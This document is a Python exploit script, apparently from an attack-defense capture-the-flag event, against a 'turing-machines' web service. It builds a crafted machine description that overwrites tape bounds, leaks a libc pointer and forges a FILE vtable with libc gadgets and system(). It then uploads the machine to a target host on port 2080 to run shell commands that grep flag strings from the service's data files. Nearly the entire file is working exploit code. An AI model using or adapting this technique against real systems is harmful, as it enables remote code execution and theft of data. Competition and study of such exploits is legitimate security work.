import json
import os
from binascii import hexlify

import requests

# Set before pwntools is imported below, so the library sees it at import time.
# NOTE(review): presumably disables pwnlib's terminal handling so output stays
# plain — confirm against the pwntools documentation.
os.environ['PWNLIB_NOTERM'] = '1'

# The star import supplies ELF, asm and context. The names `sys`, `random` and
# `string` used further down are not imported explicitly in this file, so they
# presumably arrive through this import as well — verify.
from pwn import *
# Architecture setting for pwntools; asm() is called later to build the byte
# patterns of the gadgets that are searched for in libc.
context.arch = 'amd64'


class TuringMachine:
    """
    Builder for a Turing machine description that is serialised to JSON.

    A machine is a name plus an ordered list of states. Each state is a dict
    ``{'name': ..., 'actions': [...]}``; each action is a dict using the keys
    ``'c'`` (optional condition), ``'a'`` (list of assignments), ``'h'`` (head
    movement) and ``'s'`` (next state).
    """

    def __init__(self, name):
        """
        :param name: Name of the machine, emitted by :meth:`json`
        """
        self.name = name
        self.states = []

    def add_state(self, name, actions):
        """
        Append a state to the machine.

        :param name: Name of the state
        :param actions: List of action dicts; a falsy value is stored as an empty list
        :return:
        """
        self.states.append({'name': name, 'actions': actions or []})

    def json(self):
        """
        :return: JSON string containing the machine name and all states
        """
        return json.dumps({'name': self.name, 'states': self.states})

    def json_states(self):
        """
        :return: JSON string containing only the list of states
        """
        return json.dumps(self.states)

    def _add_byte_chain(self, prefix, final_h, final_s, assignments):
        """
        Add one unconditional state per assignment, named <prefix>0..<prefix>N-1.

        Every state but the last moves the head by 1 and continues with the next
        state of the chain. The last one moves the head by 1 + <final_h> and goes
        to <final_s>.
        :param prefix: Name prefix of the generated states
        :param final_h: Extra head movement applied by the last state
        :param final_s: State entered after the last state
        :param assignments: One assignment string per generated state
        :return:
        """
        last = len(assignments) - 1
        for i, assignment in enumerate(assignments):
            if i < last:
                action = {'a': [assignment], 'h': 1, 's': f'{prefix}{i + 1}'}
            else:
                action = {'a': [assignment], 'h': 1 + final_h, 's': final_s}
            self.add_state(f'{prefix}{i}', [action])

    def write_constant(self, prefix, final_h, final_s, value):
        """
        Write a 8b constant to tape (little-endian). Then move the head by <final_h> bytes and go to state <final_s>
        :param prefix: Name of the states: <prefix>0-<prefix>7
        :param final_h: Extra head movement after the last byte
        :param final_s: State entered after the last byte
        :param value: Integer constant; only its low 64 bits are written
        :return:
        """
        # Every byte is masked, including the most significant one, so negative
        # or oversized values still produce literals in the range 0..255.
        self._add_byte_chain(prefix, final_h, final_s,
                             [f'h={(value >> (8 * i)) & 0xff}' for i in range(8)])

    def read_into_r07(self, prefix, final_h, final_s):
        """
        Copy 8 bytes from tape to registers r0..r7. Then move the head by <final_h> bytes and go to state <final_s>
        :param prefix: Name of the states: <prefix>0-<prefix>7
        :param final_h: Extra head movement after the last byte
        :param final_s: State entered after the last byte
        :return:
        """
        self._add_byte_chain(prefix, final_h, final_s, [f'r{i}=h' for i in range(8)])

    def read_into_r8f(self, prefix, final_h, final_s):
        """
        Copy 8 bytes from tape to registers r8..rf. Then move the head by <final_h> bytes and go to state <final_s>
        :param prefix: Name of the states: <prefix>0-<prefix>7
        :param final_h: Extra head movement after the last byte
        :param final_s: State entered after the last byte
        :return:
        """
        # Register names use a single lowercase hex digit: r8, r9, ra, ..., rf.
        self._add_byte_chain(prefix, final_h, final_s, [f'r{i + 8:x}=h' for i in range(8)])

    def write_r07(self, prefix, final_h, final_s):
        """
        Copy 8 bytes from registers r0..r7 to tape. Then move the head by <final_h> bytes and go to state <final_s>
        :param prefix: Name of the states: <prefix>0-<prefix>7
        :param final_h: Extra head movement after the last byte
        :param final_s: State entered after the last byte
        :return:
        """
        self._add_byte_chain(prefix, final_h, final_s, [f'h=r{i}' for i in range(8)])

    def write_r8f(self, prefix, final_h, final_s):
        """
        Copy 8 bytes from registers r8..rf to tape. Then move the head by <final_h> bytes and go to state <final_s>
        :param prefix: Name of the states: <prefix>0-<prefix>7
        :param final_h: Extra head movement after the last byte
        :param final_s: State entered after the last byte
        :return:
        """
        self._add_byte_chain(prefix, final_h, final_s, [f'h=r{i + 8:x}' for i in range(8)])

    def sub8(self, prefix, final_h, final_s, value):
        """
        Subtract value from the 8byte little-endian value under head

        For every byte position i two states are generated: <prefix>i subtracts
        the i-th byte of value, <prefix>i_1 subtracts that byte plus one (a borrow
        from the previous position). If the tape byte is smaller than the amount
        subtracted, the next position is entered through its "_1" state.
        :param prefix: Name of the states: <prefix>0-<prefix>7 and <prefix>0_1-<prefix>7_1
        :param final_h: Extra head movement after the last byte
        :param final_s: State entered after the last byte
        :param value: Integer to subtract; only its low 64 bits are used
        :return:
        """
        for i in range(7):
            v = (value >> (8 * i)) & 0xff
            # NOTE(review): for v == 0xff the borrow variant subtracts 256; this
            # relies on how the target evaluates byte arithmetic — confirm.
            for suffix, amount in (('', v), ('_1', v + 1)):
                self.add_state(f'{prefix}{i}{suffix}', [
                    {'c': f'h<{amount}', 'a': [f'h=h-{amount}'], 'h': 1, 's': f'{prefix}{i+1}_1'},
                    {'c': f'h>={amount}', 'a': [f'h=h-{amount}'], 'h': 1, 's': f'{prefix}{i+1}'},
                ])
        # Most significant byte: no further position to borrow from, so both
        # variants are unconditional and leave the chain.
        v = (value >> 56) & 0xff
        for suffix, amount in (('', v), ('_1', v + 1)):
            self.add_state(f'{prefix}7{suffix}', [
                {'a': [f'h=h-{amount}'], 'h': 1 + final_h, 's': final_s},
            ])


def build_exploiting_machine(command: str):
    """
    Build the Turing machine and the initial tape used by the exploit.

    The generated states overwrite the 8-byte fields that the inline comments
    call tapeStart and tapeEnd, copy two 8-byte values into registers r0..rf,
    write four adjusted 8-byte values back to the tape and finally write the
    bytes of <command> to the tape. Gadget and ``system`` offsets are read from
    ``./libc-2.36.so`` in the current working directory.
    :param command: Command string; one ``command<i>`` state is generated per encoded byte
    :return: Tuple ``(machine, tape)``: the TuringMachine and the initial tape as bytes
    """
    # Initial tape: one NUL byte (\x00) followed by ASCII '0' characters and 'XYZ'.
    tape = b'\x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000XYZ'
    machine = TuringMachine('exploit')
    # move head to tapeStart
    machine.add_state('initial', [{'a': [], 'h': 0x28, 's': 'writeTapeStart0'}])
    # write 0 to tapeStart, and -1 to tapeEnd
    machine.write_constant('writeTapeStart', 0, 'writeTapeEnd0', 0)
    machine.write_constant('writeTapeEnd', 0, 'readHead0', 0xffffffffffffffff)
    # r0-r7 = head, r8-rf = stdout (libc leak)
    machine.read_into_r07('readHead', 0x20, 'readStdout0')
    machine.read_into_r8f('readStdout', -0x48, 'writeVtablePtr0')

    # some gadgets from libc, all offsets relative to stdout's target
    libc = ELF('./libc-2.36.so')
    # libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
    system = libc.symbols['system'] - libc.symbols['_IO_2_1_stdout_']
    # mov rdi, rbx ; call qword ptr [rax + 0x20]
    # NOTE(review): the variable name and the layout sketch below say "rbp",
    # but the assembled pattern uses rbx — confirm which register is intended.
    gadget_movrdirbp_call20 = list(libc.search(asm('mov rdi, rbx ; call qword ptr [rax + 0x20]'), executable=True))[0] - libc.symbols['_IO_2_1_stdout_']
    # call qword ptr [rax + 0x18]
    gadget_call18 = list(libc.search(asm('call qword ptr [rax + 0x18]'), executable=True))[0] - libc.symbols['_IO_2_1_stdout_']

    # Each step below writes a register group to the tape, steps the head back
    # by 8 bytes and then adjusts the value in place with sub8. The libc offsets
    # are passed negated, so the subtraction effectively adds them.

    # write vtable ptr to 0x20 (= head-0x38-0x30)
    machine.write_r07('writeVtablePtr', -8, 'subVtablePtr0')
    machine.sub8('subVtablePtr', -0x28-0x30 + 8, 'writeGadget10', 0x38+0x30)  # afterward: head to vtable+0x08
    # write gadget1
    machine.write_r8f('writeGadget1', -8, 'subGadget10')
    machine.sub8('subGadget1', 8, 'writeSystem0', -gadget_movrdirbp_call20)
    # write system
    machine.write_r8f('writeSystem', -8, 'subSystem0')
    machine.sub8('subSystem', 0, 'writeGadget20', -system)
    # write gadget2
    machine.write_r8f('writeGadget2', -8, 'subGadget20')
    machine.sub8('subGadget2', 0x68, 'command0', -gadget_call18)  # afterward: head to reporter / payload place

    # One state per command byte; each writes the byte and advances the head by 1.
    for i, b in enumerate(command.encode()):
        machine.add_state(f'command{i}', [{'a': [f'h = {b}'], 'h': 1, 's': f'command{i + 1}'}])
    machine.add_state(f'command{len(command.encode())}', [])  # terminal state
    # The string literal below is a no-op expression statement kept as an
    # in-code sketch of the intended memory layout.
    """
            | ...            |
            |----------------|
vtable 0x00 | ?              | <-- rax    <-- vtable
vtable 0x08 | gadget 1       | --> mov rdi, rbp ; call [rax+0x20]
vtable 0x10 | ?              |
vtable 0x18 | system         |
vtable 0x20 | gadget 2       | --> call [rax+0x18]
            |----------------|
     
            |----------------|
       0x00 | 00 X Y Z ...   | <tape>     5 bytes
            |----------------|
       0x20 | &"vtable 0x00" | <machine> 56 bytes  <-- rdi   --> vtable
       0x28 | 0x00000000     |  .tapeStart
       0x30 | 0xffffffff     |  .tapeEnd  
       0x38 |                |  .head
            | ...            |
       0x48 | &head          |  .registers 0-7
       0x50 | stdout         |  .registers 8-f
            |----------------|
       0x60 | "cat *.json"   | <payload>  <-- rbp
            |----------------|
            | ...            |
    """

    return machine, tape


def check_exploit_local():
    """
    Run the exploit against a local build of the service binary.

    Writes ``machine.json`` and ``tape`` into the current directory, changes
    into ``../service`` and invokes ``./turing-machines`` twice: first with its
    output redirected to ``turingcode/testcode.cpp``, then with ``-run``.
    :return:
    """
    machine, tape = build_exploiting_machine('id ; pwd ; ls /')

    with open('machine.json', 'w') as machine_file:
        machine_file.write(machine.json())
    with open('tape', 'wb') as tape_file:
        tape_file.write(tape)

    generate_cmd = './turing-machines -tape=../exploits/tape ../exploits/machine.json > turingcode/testcode.cpp'
    run_cmd = './turing-machines -tape=../exploits/tape -run ../exploits/machine.json'

    os.chdir('../service')
    os.system(generate_cmd)
    # Flush the separator before the child process writes to the same stdout.
    print('---', flush=True)
    os.system(run_cmd)


def random_string(l):
    """
    Return a random string of ASCII letters.

    :param l: Number of characters to generate
    :return: String of <l> characters drawn from string.ascii_letters
    """
    alphabet = string.ascii_letters
    letters = []
    for _ in range(l):
        letters.append(random.choice(alphabet))
    return ''.join(letters)


def exploit(target):
    """
    Upload the exploiting machine to a target service, run it and print the output.

    Posts the machine states to ``/machine/new`` on port 2080, takes the machine
    identifier from the last path segment of the resulting URL, then posts the
    hex-encoded tape to ``/machine/run/<ident>``. If the reply contains a
    ``<pre>`` element its content is printed, otherwise the whole reply body.
    :param target: Host name or address of the service
    :return:
    """
    machine, tape = build_exploiting_machine('id ; pwd ; grep -ohE "SAAR\\\\{[A-Za-z0-9_-]+\\\\}" data/*.json')
    # The context manager closes the session's pooled connections on exit,
    # including when one of the requests raises.
    with requests.Session() as s:
        response = s.post(f'http://{target}:2080/machine/new', data={'name': random_string(16), 'states': machine.json_states()})
        print(response.url)
        ident = response.url.split('/')[-1]
        response = s.post(f'http://{target}:2080/machine/run/{ident}', data={'tape': hexlify(tape).decode(), 'ident': ident, 'action': 'run'})
    print(response)
    if '<pre>' not in response.text:
        print(response.text)
    else:
        # Everything between the first <pre> and the last </pre>.
        print(response.text.split('<pre>', 1)[1].rsplit('</pre>', 1)[0])


if __name__ == '__main__':
    # check_exploit_local()
    # The first command-line argument selects the target host; default is localhost.
    if len(sys.argv) > 1:
        target_host = sys.argv[1]
    else:
        target_host = 'localhost'
    exploit(target_host)
